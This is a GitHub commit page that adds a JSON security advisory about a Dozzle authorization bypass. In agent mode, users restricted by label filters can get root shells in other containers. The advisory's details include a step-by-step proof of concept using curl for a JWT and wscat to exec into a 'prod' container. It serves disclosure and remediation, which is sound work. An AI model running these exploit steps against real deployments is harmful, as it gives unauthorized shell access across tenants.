Skip to content

Commit c01bc09

Browse files
1 parent 1e97e04 commit c01bc09

1 file changed

Lines changed: 65 additions & 0 deletions

File tree

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-m855-r557-5rc5",
4+
"modified": "2026-01-27T00:55:33Z",
5+
"published": "2026-01-27T00:55:33Z",
6+
"aliases": [
7+
"CVE-2026-24740"
8+
],
9+
"summary": "Dozzle Agent Label-Based Access Control Bypass Allows Unauthorized Container Shell Access",
10+
"details": "### Summary\nA flaw in Dozzle’s agent-backed shell endpoints allows a user restricted by label filters (for example, `label=env=dev`) to obtain an interactive root shell in out‑of‑scope containers (for example, `env=prod`) on the same agent host by directly targeting their container IDs.\n\n**Note**: Tested on `v9.0.2` likely affects all versions with agent mode support.\n\n### Details\nWhen SIMPLE auth is enabled, Dozzle supports per‑user label filters in `users.yaml` (for example, filter: `label=env=dev`) to restrict which containers a user can see and interact with. These filters are propagated into the shell handlers, which resolve the target container via `h.hostService.FindContainer(hostKey(r), id, userLabels)` in both the attach and exec WebSocket endpoints, intending to limit shell access to containers within the user’s label scope.\n\nFor agent-backed hosts, the corresponding implementation ignores the label scope when resolving a container by ID ([agent_service.go#L27-L29](https://github.com/amir20/dozzle/blob/master/internal/support/container/agent_service.go#L27-L29)):\n```go\nfunc (a *agentService) FindContainer(ctx context.Context, id string, labels container.ContainerLabels) (container.Container, error) {\n return a.client.FindContainer(ctx, id)\n}\n```\n\nAs a result, an authenticated user configured with filter: `label=env=dev` and granted the shell role cannot see `env=prod` containers in the UI, but can still establish an interactive exec session into an `env=prod` container by calling `/api/hosts/{hostId}/containers/{containerId}/exec` (or `/attach`) with a valid JWT and the target container ID. This discrepancy between listing and exec/attach behavior breaks the intended label‑based isolation between environments or tenants for agent-backed deployments.\n\n**Note**: The underlying Docker client implementation explicitly documents that `FindContainer` skips filters ([docker/client.go#L128-L137](https://github.com/amir20/dozzle/blob/master/internal/docker/client.go#L128-L137)):\n```go\n// Finds a container by id, skipping the filters\nfunc (d *DockerClient) FindContainer(ctx context.Context, id string) (container.Container, error) {\n log.Debug().Str(\"id\", id).Msg(\"Finding container\")\n if json, err := d.cli.ContainerInspect(ctx, id); err == nil {\n return newContainerFromJSON(json, d.host.ID), nil\n } else {\n return container.Container{}, err\n }\n}\n```\n\n**Note**: For reference, we can see the correct implementation in `ListContainers` ([agent_service.go#L43-L46](https://github.com/amir20/dozzle/blob/master/internal/support/container/agent_service.go#L43-L46)):\n```go\nfunc (a *agentService) ListContainers(ctx context.Context, labels container.ContainerLabels) ([]container.Container, error) {\n\tlog.Debug().Interface(\"labels\", labels).Msg(\"Listing containers from agent\")\n\treturn a.client.ListContainers(ctx, labels)\n}\n```\n### PoC\n```bash\n# create new dir\n$ cd /tmp && mkdir -p /tmp/dozzle && cd /tmp/dozzle && mkdir -p data\n\n# run dozzle agent\n$ docker run -d --name dozzle-agent \\\n -v /var/run/docker.sock:/var/run/docker.sock:ro \\\n -p 7007:7007 \\\n amir20/dozzle:latest agent\n\n# sleep\n$ sleep 5\n\n# run dev container\n$ docker run -d --name dev-allowed --label env=dev alpine sleep 100000\n\n# run prod container\n$ docker run -d --name prod-secret --label env=prod alpine sleep 100000\n\n# check containers status\n$ docker ps --format \"table {{.ID}}\\t{{.Names}}\\t{{.Label \\\"env\\\"}}\" | grep -E 'dev-allowed|prod-secret'\n3731627f4e2d prod-secret prod\n51e6cffce99f dev-allowed dev\n\n# get hash for pass:devpass\n$ HASH=$(printf 'devpass' | sha256sum | awk '{print $1}')\n\n# create dev user\n$ cat > /tmp/dozzle/data/users.yaml << EOF\nusers:\n devuser:\n email: dev@example.com\n name: Dev User\n password: ${HASH}\n filter: \"label=env=dev\"\n roles: \"shell\"\nEOF\n\n# sanity check users \n$ cat /tmp/dozzle/data/users.yaml\nusers:\n devuser:\n email: dev@example.com\n name: Dev User\n password: fee39c23856e3d9dd500861a30903548b8878994291b2fef7fff2f53b3073c0c\n filter: \"label=env=dev\"\n roles: \"shell\"\n\n# run main image\n$ docker run -d --name dozzle-main \\\n -v /tmp/dozzle/data:/data \\\n -p 8080:8080 \\\n -e DOZZLE_AUTH_PROVIDER=simple \\\n -e DOZZLE_AUTH_TTL=48h \\\n -e DOZZLE_ENABLE_SHELL=true \\\n -e \"DOZZLE_REMOTE_AGENT=host.docker.internal:7007\" \\\n amir20/dozzle:latest\n\n# sleep\n$ sleep 8\n\n# get jwt token for devuser\n$ curl -s -X POST http://localhost:8080/api/token \\\n -d \"username=devuser&password=devpass\" \\\n -c /tmp/dozzle/cookies.txt\n\n# save the token\n$ TOKEN=$(grep jwt /tmp/dozzle/cookies.txt | awk '{print $7}')\n\n# in browser open http://localhost:8080 -> login with user:devuser pass:devpass -> grab host http://localhost:8080/host/cafb9ffc-ac34-47a6-985b-10ffea39610e\n$ HOST_ID=\"cafb9ffc-ac34-47a6-985b-10ffea39610e\"\n\n# get prod cid\n$ PROD_CID=$(docker ps --filter \"name=prod-secret\" --format '{{.ID}}')\n\n# sanity check\n$ echo $PROD_CID\n3731627f4e2d\n\n# install wscat\n$ npm install -g wscat\n\n# open wscat with token\n$ wscat -c \"ws://localhost:8080/api/hosts/${HOST_ID}/containers/${PROD_CID}/exec\" \\\n -H \"Cookie: jwt=${TOKEN}\"\nConnected (press CTRL+C to quit)\n< / # \n/ # \n> {\"type\":\"userinput\",\"data\":\"id\\n\"}\n< id\n\n< uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n/ # \n> {\"type\":\"userinput\",\"data\":\"cat /etc/hostname\\n\"}\n< cat /etc/hostname\n\n< 3731627f4e2d\n\n< / # \n> quit\nDisconnected (code: 1006, reason: \"\")\n```\nAs configured, `devuser` only sees dev-allowed in the Dozzle UI (due to filter: `label=env=dev`), but can still open a root shell in prod-secret via the agent-backed exec endpoint by supplying its container ID.\n\n### Impact\nThis is an authorization bypass in environments that rely on SIMPLE auth label filters together with agents to separate environments or tenants. A user who should be constrained to a specific label set (for example, `env=dev`) but has the Shell role can gain full interactive access (**read**, **modify**, **disrupt**) to containers with other labels (for example, `env=prod`) on the same agent host, provided they can obtain the target container ID.\n\n### Remediation\n- In the agent-backed `FindContainer` implementation, enforce the same label-based filtering semantics as the Docker/Kubernetes host implementations by ensuring the requested (host, containerId) is within the set returned by `ListContainers` for the caller’s `userLabels` before returning it to exec/attach.\n\n- Add regression tests verifying that a user with filter: `label=env=dev` and the Shell role cannot exec or attach into `env=prod` containers via the agent path, even when supplying a valid container ID.\n\n- As defense in depth, reject exec/attach requests when the resolved container is not present in the user-visible subset returned by the list API under the same label filter.\n\nThis issue has been fixed in version 9.0.3 but the Go registry only contains versions up to 1.29.0. Use Docker or GitHub to download \n9.0.3.\n\n### Resources\n- https://dozzle.dev/guide/authentication#setting-specific-filters-for-users",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/amir20/dozzle"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.29.1-0.20260125230338-620e59aa2463"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/amir20/dozzle/security/advisories/GHSA-m855-r557-5rc5"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/amir20/dozzle/commit/620e59aa246347ba8a27e68c532853b8a5137bc1"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/amir20/dozzle"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/amir20/dozzle/releases/tag/v9.0.3"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-639"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-01-27T00:55:33Z",
63+
"nvd_published_at": null
64+
}
65+
}

0 commit comments

Comments
 (0)